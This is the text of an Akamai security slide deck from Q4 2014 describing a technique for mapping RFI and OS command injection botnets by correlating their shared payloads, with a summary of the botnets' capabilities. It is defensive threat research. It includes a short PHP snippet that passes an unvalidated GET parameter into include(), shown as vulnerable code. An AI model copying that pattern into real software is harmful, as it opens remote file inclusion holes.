akamai.com

[Q4 2014 ]

• New analysis technique using data from the Akamai

Intelligent PlatformTM

• Automate discovery of web application vulnerabilities for

Remote File Inclusion (RFI) and OS Command Injection

attacks

• Botnets profiled by identifying malicious code resource

URLs and seemingly identical payloads

• Analysis does not require inclusion in the botnet or taking

over the botnet’s command and control (C&C, C2) server

[Download the Q4 2014 Global DDoS Attack Report for supporting data and analysis]

= botnet profiling technique

2 / [The State of the Internet] / Security (Q4 2014)

= Remote File Inclusion (RFI) attacks

3 / [The State of the Internet] / Security (Q4 2014)

• Used to exploit dynamic file include mechanisms

in web applications

• Web application can be tricked into including

remote files with malicious code

• RFI vulnerabilities are easily found and exploited

by attackers

$dir = $_GET['module_name'];

include($dir . "/function.php");

Figure 1: Code vulnerable to a Remote File Inclusion attack

= OS Command Injection

4 / [The State of the Internet] / Security (Q4 2014)

• Used to execute unauthorized operating system

commands

• The result of mixing trusted code with untrusted data

• Commands executed by the attacker will run with the

same privileges of the commanding component

• Attackers can leverage this ability to gain access

and damage parts that are not reachable

= common payloads in botnets

5 / [The State of the Internet] / Security (Q4 2014)

• RFI and OS Command Injection are among the most

prevalent of vulnerabilities reported

• Attacker can take full control over the victim server

• The most favorable attack vector

• In recent months, Akamai has observed massively

orchestrated attempts to find such vulnerabilities

• Botnet machines, even geographically disparate machines belonging to

different organizations, try to inject the same remote piece of malicious

code

• Code correlations enabled Akamai to map multiple Internet botnets

operating at the time of the comparison

• RFI and OS Command Injection botnets targeted more

than 850 web applications across several top-level

domains over a seven-day period

• All of the botnet traffic appeared to originate from

compromised servers, most from popular Software-as-

a-Service (SaaS) and cloud hosting providers

• The botnet Akamai analyzed included a dedicated

Python script that performed web crawling disguised as

a Microsoft Bing bot

• In one instance, an observed botnet propagated

through two WordPress TimThumb vulnerabilities

= botnet findings

6 / [The State of the Internet] / Security (Q4 2014)

= analysis of botnet capabilities

Figure 2: Code for remote file upload

7 / [The State of the Internet] / Security (Q4 2014)

Both RFI and OS Command Injection attacks used the same

malicious code involving:

• Remote shell command execution

• Remote file upload (see figure)

• SMS sending, controlled by IRC commands

• Local FTP server credentials brute force attack

• IRC-controlled UDP/TCP denial of service flood

• Novel approach to understanding web application-layer

botnets

• Used attack payload as the common denominator to

aggregate data and map botnet information

• Does not require the researcher to be a part of the botnet or

to take over the botnet’s C2 server

• Can be used for mapping other types of malicious activities

that use a distinct payload

= conclusion

8 / [The State of the Internet] / Security (Q4 2014)

• Download the Q4 2014 State of the Internet Security Report

• The Q4 2014 report covers:

/ Analysis of DDoS attack trends

/ Breakdown of average Gbps/Mbps statistics

/ Year-over-year and quarter-by-quarter analysis

/ Types and frequency of application-layer attacks

/ Types and frequency of infrastructure attacks

/ Trends in attack frequency, size and sources

/ Where and when DDoSers launch attacks

/ Case study and analysis

= Q4 2014 global attack report

9 / [The State of the Internet] / Security (Q4 2014)

• StateoftheInternet.com, brought to you by Akamai,

serves as the home for content and information intended to

provide an informed view into online connectivity and

cybersecurity trends as well as related metrics, including

Internet connection speeds, broadband adoption, mobile

usage, outages, and cyber-attacks and threats.

• Visitors to www.stateoftheinternet.com can find current and

archived versions of Akamai’s State of the Internet

(Connectivity and Security) reports, the company’s data

visualizations, and other resources designed to put context

around the ever-changing Internet landscape.

= about Prolexic

10 / [The State of the Internet] / Security (Q4 2014)